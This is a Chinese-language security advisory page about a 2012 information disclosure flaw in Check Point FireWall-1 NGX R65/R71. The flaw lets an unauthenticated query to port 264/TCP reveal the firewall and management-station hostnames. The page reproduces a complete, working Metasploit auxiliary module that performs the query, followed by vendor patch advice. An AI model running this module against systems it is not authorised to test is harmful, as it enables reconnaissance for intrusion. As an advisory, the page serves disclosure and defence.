首页 -> 安全研究
安全研究
安全漏洞
多个Check Point防火墙产品信息泄露漏洞
发布日期:2012-03-12
更新日期:2012-03-14
受影响系统:
Check Point Software FireWall-1 NGX R71描述:
Check Point Software FireWall-1 NGX R65
BUGTRAQ ID: 52430
Check Point软件技术有限公司成立时间于 1993 年,美国总部在加利福尼亚州红木城,是全球首屈一指的 Internet 安全解决方案供应商,在全球企业防火墙、个人防火墙及虚拟专用网络(VPN )市场上居于领导地位。
Check Point多款端点安全产品在实现上存在信息泄露漏洞,通过发送某些查询到CheckPoint Firewall-1上的端口264/TCP,会显示主机名。攻击者可利用此漏洞获取敏感信息。
<*来源:Patrick Webster (pwebster@ausgeo.com.au)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
'Description' => %q{
This module sends a query to the port 264/TCP on CheckPoint Firewall-1
firewalls to obtain the firewall name and management station
(such as SmartCenter) name via a pre-authentication topology request.
Note that the SecuriTeam reference listed here is not the same vulnerabilty, but it
does discus the same protocol and is somewhat related to this information
disclosure.
},
'Author' => [ 'patrick' ],
'DisclosureDate' => 'Dec 14 2011', # Looks like this module is first real reference
'References' =>
[
# patrickw - None? Stumbled across, probably an old bug/feature but unsure.
[ 'URL', 'http://www.osisecurity.com.au/advisories/' ], # Advisory coming soon, placeholder
[ 'URL', 'http://www.securiteam.com/securitynews/5HP0D2A4UC.html' ] # Related-ish
]
))
register_options(
[
Opt::RPORT(264),
], self.class)
end
def autofilter
false
end
def run
print_status("Attempting to contact Checkpoint FW1 SecuRemote Topology service...")
fw_hostname = nil
sc_hostname = nil
connect
sock.put("\x51\x00\x00\x00")
sock.put("\x00\x00\x00\x21")
res = sock.get_once(4)
if (res == "Y\x00\x00\x00")
print_good("Appears to be a CheckPoint Firewall...")
sock.put("\x00\x00\x00\x0bsecuremote\x00")
res = sock.get_once
if (res =~ /CN=(.+),O=(.+)\./i)
fw_hostname = $1
sc_hostname = $2
print_good("Firewall Host: #{fw_hostname}")
print_good("SmartCenter Host: #{sc_hostname}")
end
else
print_error("Unexpected response: '#{res.inspect}'")
end
report_info(fw_hostname,sc_hostname)
disconnect
end
# Only trust that it's real if we have a hostname. If you get a funny
# response, it might not be what we think it is.
def report_info(fw_hostname,sc_hostname)
return unless fw_hostname
host_info = {
:host => datastore['RHOST'],
:os_name => "Checkpoint Firewall-1",
:purpose => "firewall"
}
host_info[:name] = fw_hostname
host_info[:info] = "SmartCenter Host: #{sc_hostname}" if sc_hostname
report_host(host_info)
svc_info = {
:host => datastore['RHOST'],
:port => datastore['RPORT'],
:proto => "tcp",
:name => "securemote"
}
report_service(svc_info)
end
end
建议:
厂商补丁:
Check Point Software
--------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.checkpoint.com
浏览次数:2129
严重程度:0(网友投票)
绿盟科技给您安全的保障